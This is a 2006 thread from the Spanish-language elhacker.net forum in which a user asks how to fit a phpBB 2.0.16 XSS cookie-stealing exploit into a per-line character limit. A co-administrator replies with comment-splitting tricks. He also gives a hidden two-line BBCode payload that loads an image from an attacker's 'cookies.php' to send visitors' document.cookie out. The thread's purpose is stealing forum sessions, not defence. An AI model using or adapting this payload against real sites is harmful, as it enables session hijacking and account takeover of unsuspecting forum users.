elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 15:27  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  problema con XSS en phpbb
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: problema con XSS en phpbb  (Leído 1,666 veces)
heat

Desconectado Desconectado

Mensajes: 15


Ver Perfil
problema con XSS en phpbb
« en: 16 Febrero 2006, 17:19 »

hola

estoy intentando usar el exploit de XSS en phpbb 2.0.16 concretamente este http://

el problema que tengo es que esta limitado el numero de caracteres por linea y no puedo meterlo todo junto en una sola

alguna idea??
« Última modificación: 17 Febrero 2006, 16:25 por Sirdarckcat » En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: problema con XSS en phpbb
« Respuesta #1 en: 17 Febrero 2006, 16:28 »

no puedes poner links..

intenta asi:
suponiendo que lograste meter un <script>..
Código:
*/alert("VIVA YO");/*
*/prompt("VIVA TU??",":P");/*
*/confirm("VIVA?");/*
*/open("http://foro.elhacker.net/");/*
*/open("http://www.google.com/");/*

si ves las /* comentan el posible <br> que creo que es el que te agrega, no?
los */ empiezan el codigo de nuevo.

En fin.. saludos!!
En línea

heat

Desconectado Desconectado

Mensajes: 15


Ver Perfil
Re: problema con XSS en phpbb
« Respuesta #2 en: 17 Febrero 2006, 19:40 »

no puedes poner links..


el link era a el exploit, no a ningun foro vulnerable

ademas creo que no se ha entendido, no puedo poner esto en una linea
http://kisobox.com/exploits/Remote/phpbb.2.0.16.xss+cookies.stealer.txt
« Última modificación: 17 Febrero 2006, 19:42 por heat » En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: problema con XSS en phpbb
« Respuesta #3 en: 18 Febrero 2006, 07:17 »

ponla en 2..
Código:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(sx.sss+this.sss));'sss=`i=new/**/Image();i.src=`style='font-size:0;][/url][/url]'[/color]

[color=#EFEFEF][url]www.ut[url=www.s=''sss=`http://mysite/cookies.php?c='+document.cookie`style='font-size:0;][/url][/url]'[/color]

o en 3.. o no se, hay muchas maneras.. haberia que ver el limite de caracteres por linea

Saludos!!
En línea

DarkJose

Desconectado Desconectado

Mensajes: 101


Ver Perfil
Re: problema con XSS en phpbb
« Respuesta #4 en: 24 Febrero 2006, 21:01 »

con eso de arriba se podria hacer un redirect? :o
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines